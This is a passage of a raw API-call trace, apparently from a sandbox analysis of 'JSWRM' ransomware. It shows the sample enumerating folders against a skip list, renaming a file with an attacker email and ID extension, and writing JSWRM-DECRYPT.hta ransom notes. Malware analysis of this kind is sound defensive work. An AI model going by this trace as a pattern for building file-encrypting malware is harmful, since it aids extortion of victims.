cAlternateFileName="")) returned 0x232040 [0067.954] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.954] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa0635c03, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f29af4f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.955] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.955] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.955] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f29af4f, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f29af4f, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f29af4f, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0067.955] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0067.955] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0067.955] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0067.955] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0067.955] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0067.955] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0067.955] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0067.955] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0067.955] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0067.955] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0067.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0067.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0067.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241380, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0067.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.956] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0067.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0067.956] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2411c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0067.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0067.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225658 | out: hHeap=0x1e0000) returned 1 [0067.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0067.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0067.956] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e126ecb, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e126ecb, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e126ecb, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0067.956] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2=".") returned 1 [0067.956] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="..") returned 1 [0067.956] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="...") returned 1 [0067.956] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="windows") returned -1 [0067.956] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="recovery") returned 1 [0067.956] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="perflogs") returned 1 [0067.956] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="documents and settings") returned 1 [0067.956] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0067.956] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="system volume information") returned 1 [0067.956] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="msocache") returned 1 [0067.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0067.956] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0067.956] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0067.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0067.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0067.956] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0067.956] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tipresx.dll.mui", lpUsedDefaultChar=0x0) returned 15 [0067.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0067.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0067.956] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0067.956] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.956] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0067.956] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-ca\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0067.957] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10080253886322304) returned 0 [0067.957] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0067.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0067.957] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0, lpNumberOfBytesRead=0x345e89c*=0x0, lpOverlapped=0x0) returned 0 [0067.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0067.957] CloseHandle (hObject=0xffffffff) returned 1 [0067.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0067.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0067.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.957] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0067.957] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.957] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0067.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0067.958] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0067.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0067.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0067.958] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0067.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0067.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.958] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-ca\\tipresx.dll.mui"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-CA\\tipresx.dll.mui.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-ca\\tipresx.dll.mui.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0067.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0067.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0067.958] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0067.958] FindNextFileW (in: hFindFile=0x232040, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e126ecb, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e126ecb, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e126ecb, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0067.958] FindClose (in: hFindFile=0x232040 | out: hFindFile=0x232040) returned 1 [0067.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0067.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0067.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0067.963] FindNextFileW (in: hFindFile=0x231f40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06369df, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1a32dfff, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0067.963] lstrcmpiW (lpString1="fr-FR", lpString2=".") returned 1 [0067.963] lstrcmpiW (lpString1="fr-FR", lpString2="..") returned 1 [0067.963] lstrcmpiW (lpString1="fr-FR", lpString2="...") returned 1 [0067.963] lstrcmpiW (lpString1="fr-FR", lpString2="windows") returned -1 [0067.963] lstrcmpiW (lpString1="fr-FR", lpString2="recovery") returned -1 [0067.963] lstrcmpiW (lpString1="fr-FR", lpString2="perflogs") returned -1 [0067.963] lstrcmpiW (lpString1="fr-FR", lpString2="documents and settings") returned 1 [0067.963] lstrcmpiW (lpString1="fr-FR", lpString2="$RECYCLE.BIN") returned 1 [0067.963] lstrcmpiW (lpString1="fr-FR", lpString2="system volume information") returned -1 [0067.963] lstrcmpiW (lpString1="fr-FR", lpString2="msocache") returned -1 [0067.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225768 [0067.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0067.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0067.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225190 [0067.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225190 | out: hHeap=0x1e0000) returned 1 [0067.963] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\jswrm-decrypt.hta")) returned 0xffffffff [0067.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0067.963] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0067.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0067.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0067.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0067.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0067.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0067.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0067.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0067.964] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0067.964] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0067.964] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0067.970] CloseHandle (hObject=0x454) returned 1 [0067.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0067.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0067.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0067.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224b30 [0067.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2257f0 [0067.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0067.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0067.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0067.971] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\jswrm-decrypt.hta")) returned 0x20 [0067.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0067.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2257f0 | out: hHeap=0x1e0000) returned 1 [0067.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0067.971] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fr-FR\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06369df, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f2c1044, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x231dc0 [0067.971] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0067.971] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b63f64, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa06369df, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x1f2c1044, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.971] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0067.971] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0067.971] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f2c1044, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1f2c1044, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1f2c1044, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0067.971] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0067.971] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0067.971] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0067.971] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0067.971] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0067.971] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0067.971] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0067.971] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0067.971] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0067.971] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0067.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0067.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0067.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0067.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0067.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0067.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240ef8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0067.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0067.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0067.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0067.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0067.972] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e100c60, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e100c60, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e100c60, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0067.972] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2=".") returned 1 [0067.972] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="..") returned 1 [0067.972] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="...") returned 1 [0067.972] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="windows") returned -1 [0067.972] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="recovery") returned 1 [0067.972] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="perflogs") returned 1 [0067.972] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="documents and settings") returned 1 [0067.972] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="$RECYCLE.BIN") returned 1 [0067.972] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="system volume information") returned 1 [0067.972] lstrcmpiW (lpString1="tipresx.dll.mui", lpString2="msocache") returned 1 [0067.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0067.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0067.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tipresx.dll.mui", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 